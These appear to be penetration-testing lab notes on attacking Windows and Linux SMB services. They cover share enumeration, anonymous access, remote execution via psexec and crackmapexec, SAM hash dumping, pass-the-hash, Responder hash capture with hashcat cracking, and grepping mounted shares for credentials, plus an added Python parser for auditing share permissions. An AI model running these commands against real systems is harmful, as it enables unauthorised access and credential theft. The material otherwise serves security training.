SMB

Encountering SMB

1. list all SMB shares using smbmap
2. use rpcclient to enumerate users
3. brute force SMB or check for anonymous access (don't specify a username, hit enter for the password)
4. after getting a foothold:
   - look for clear text credentials
   - attempt RCE
   - attempt lateral movement by PtH and by enumerating logged-on users

SMB

port 137/138/139/445

Server Message Block is used for file sharing. It is very common in Windows networks.

see brute force SMB in Cracking Network Services

Attacking SMB

List all SMB Shares

smbclient

smbclient -N -L IP

smbmap (it also lists permissions along w/ shares; convenient)

smbmap -H IP

[+] IP: 10.129.14.128:445     Name: 10.129.14.128                                   
        Disk                                                    Permissions     Comment
        --                                                   ---------    -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       IPC Service (DEVSM)
        notes                                                   READ, WRITE     CheckIT
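As an added example (not part of these notes), a small parser for the smbmap share listing shown above, so a share audit run over many hosts can be triaged automatically: it turns each row into a record and flags writable shares and any non-admin share that was readable from a guest (null) session. The sample input is the listing above pasted in as a constructed string.

```python
import re
from dataclasses import dataclass
# Constructed sample input: the smbmap -H listing from the notes above, pasted verbatim.
SAMPLE_OUTPUT = """\
[+] IP: 10.129.14.128:445     Name: 10.129.14.128
        Disk                                                    Permissions     Comment
        --                                                   ---------    -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       IPC Service (DEVSM)
        notes                                                   READ, WRITE     CheckIT
"""

# Host banner; "Guest session" shows smbmap got in with a null/guest login.
HOST_RE = re.compile(r"^\[\+\]\s+(Guest session\s+)?IP:\s+(\S+)\s+Name:")
# One share row: name, one of smbmap's permission strings, optional comment.
SHARE_RE = re.compile(
    r"^\s+(.+?)\s{2,}(NO ACCESS|READ ONLY|WRITE ONLY|READ, WRITE)(?:\s+(.*?))?\s*$")

@dataclass
class Share:
    host: str
    name: str
    perms: str
    comment: str
    guest: bool  # listing came from an unauthenticated session

def parse_smbmap(text):
    """Turn smbmap's text listing into Share records (one host per banner)."""
    host, guest, shares = None, False, []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            guest, host = m.group(1) is not None, m.group(2)
            continue
        m = SHARE_RE.match(line)
        if m and host:
            shares.append(Share(host, m.group(1).strip(), m.group(2),
                                (m.group(3) or "").strip(), guest))
    return shares

def findings(shares):
    """Audit view: writable shares, and non-admin shares readable without credentials."""
    out = []
    for s in shares:
        if "WRITE" in s.perms:
            out.append((s.host, s.name, "writable"))
        elif s.guest and s.perms != "NO ACCESS" and not s.name.endswith("$"):
            out.append((s.host, s.name, "readable by guest"))
    return out
```

Feed it the saved output of several `smbmap -H` runs and the findings list is the set of shares to review for loose permissions.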

list all SMB shares as a given user

smbclient -L -U username \\\\IP

Connecting to SMB

smbclient

smbclient //server-ip-or-name/share_name -U username

rpcclient

rpcclient -U "" 10.129.14.128

smbmap (using -r to recursively view all directories)

smbmap -H 10.129.14.128 -r notes

[+] Guest session       IP: 10.129.14.128:445    Name: 10.129.14.128                           
        Disk                                                    Permissions     Comment
        --                                                   ---------    -------
        notes                                                   READ, WRITE
        .\notes\*
        dr--r--r               0 Mon Nov  2 00:57:44 2020    .
        dr--r--r               0 Mon Nov  2 00:57:44 2020    ..
        dr--r--r               0 Mon Nov  2 00:57:44 2020    LDOUJZWBSG
        fw--w--w             116 Tue Apr 16 07:43:19 2019    note.txt
        fr--r--r               0 Fri Feb 22 07:43:28 2019    SDT65CB.tmp
        dr--r--r               0 Mon Nov  2 00:54:57 2020    TPLRNSMWHQ
        dr--r--r               0 Mon Nov  2 00:56:51 2020    WDJEQFZPNO
        dr--r--r               0 Fri Feb 22 07:44:02 2019    WindowsImageBackup

smbmap download file

smbmap -H 10.129.14.128 --download "notes\note.txt"

smbmap upload file

smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

rpcclient

Query: Description

srvinfo: Server information.
enumdomains: Enumerate all domains that are deployed in the network.
querydominfo: Provides domain, server, and user information of deployed domains.
netshareenumall: Enumerates all available shares.
netsharegetinfo <share>: Provides information about a specific share.
enumdomusers: Enumerates all domain users.
queryuser <RID>: Provides information about a specific user.

view all users

rpcclient -U'%' 10.10.110.17
rpcclient $> enumdomusers

Brute-forcing SMB

SMB section in Cracking Network Services

Windows-specific Attacks

Linux SMB offers a limited attack surface; Windows SMB has a much larger one (given admin privileges, of course)

RCE on Windows SMB

with admin privileges, we can get RCE over SMB using

impacket

impacket-psexec administrator:'Password123!'@10.10.110.17

crackmapexec

crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

Enumerating Logged-on Users

enumerate all machines in the subnet if there are multiple machines present and we want to know which users are logged on

crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

PtH (Attacking SAM Databases)

dump SAM database hashes

crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

more on this in Attacking SAM

after obtaining the hash, perform PtH attack or crack it

crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453

Forced Authentication Attacks via SMB

capture users' hashes by tricking systems into authenticating to a server we control

Using Responder to carry out Forced Authentication Attack

responder -I <interface name>

example:

sudo responder -I ens33

hashes are saved in /usr/share/responder/logs/
If you notice multiple different hashes for one account, that is expected: the hashes are salted, so each capture differs

Cracking the intercepted NetNTLMv2 Hash

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

if we can't crack the hash, perform PtH attack

Mounting SMB

Windows GUI

press [WINKEY] + [R] to open the Run dialog box; type the file share location, e.g.: \\192.168.220.129\Finance

Windows CMD - dir

C:\htb> dir \\192.168.220.129\Finance\

Volume in drive \\192.168.220.129\Finance has no label.
Volume Serial Number is ABCD-EFAA

Directory of \\192.168.220.129\Finance

02/23/2022  11:35 AM    <DIR>          Contracts
               0 File(s)          4,096 bytes
               1 Dir(s)  15,207,469,056 bytes free

Windows CMD - Net Use

net use can map a network share as a local drive

C:\htb> net use n: \\192.168.220.129\Finance

The command completed successfully.

authenticate w/ username and password:

C:\htb> net use n: \\192.168.220.129\Finance /user:plaintext Password123

The command completed successfully.

after mapping the Share to n: drive, we can execute commands as if it were a local drive

count how many files the share contains

C:\htb> dir n: /a-d /s /b | find /c ":\"

29302

Searching for specific files of interest

such as cred or secrets

C:\htb>dir n:\*cred* /s /b

n:\Contracts\private\credentials.txt


C:\htb>dir n:\*secret* /s /b

n:\Contracts\private\secret.txt

Use findstr to find credentials

c:\htb>findstr /s /i cred n:\*.*

n:\Contracts\private\secret.txt:file with all credentials
n:\Contracts\private\credentials.txt:admin:SecureCredentials!

Windows PowerShell

PS C:\htb> Get-ChildItem \\192.168.220.129\Finance\

    Directory: \\192.168.220.129\Finance

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         2/23/2022   3:27 PM                Contracts

Windows PowerShell - New-PSDrive instead of Net Use

PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem"

Name           Used (GB)     Free (GB) Provider      Root                                               CurrentLocation
----           ---------     --------- --------      ----                                               ---------------
N                                      FileSystem    \\192.168.220.129\Finance

authenticate w/ username and password

PS C:\htb> $username = 'plaintext'
PS C:\htb> $password = 'Password123'
PS C:\htb> $secpassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\htb> $cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" -Credential $cred

Name           Used (GB)     Free (GB) Provider      Root                                                              CurrentLocation
----           ---------     --------- --------      ----                                                              ---------------
N                                      FileSystem    \\192.168.220.129\Finance

count how many files it contains

PS C:\htb> N:
PS N:\> (Get-ChildItem -File -Recurse | Measure-Object).Count

29302

Searching for secrets in PowerShell using -Include

PS C:\htb> Get-ChildItem -Recurse -Path N:\ -Include *cred* -File

    Directory: N:\Contracts\private

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/23/2022   4:36 PM             25 credentials.txt

Searching for secrets in PowerShell using Select-String

PS C:\htb> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List

N:\Contracts\private\secret.txt:1:file with all credentials
N:\Contracts\private\credentials.txt:1:admin:SecureCredentials!

Linux

Linux - Mount

install cifs-utils

sudo apt install cifs-utils
sudo mkdir /mnt/Finance
sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //192.168.220.129/Finance /mnt/Finance

instead of passing the username and password on the command line, we can use a credentials file

credentialfile.txt:

username=plaintext
password=Password123
domain=.

mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/credentialfile

Linux - Find & Grep

after mount, we can use find as if we're in the local directory

find /mnt/Finance/ -name '*cred*'
/mnt/Finance/Contracts/private/credentials.txt

we can use grep too

grep -rn /mnt/Finance/ -ie cred
/mnt/Finance/Contracts/private/credentials.txt:1:admin:SecureCredentials!
/mnt/Finance/Contracts/private/secret.txt:1:file with all credentials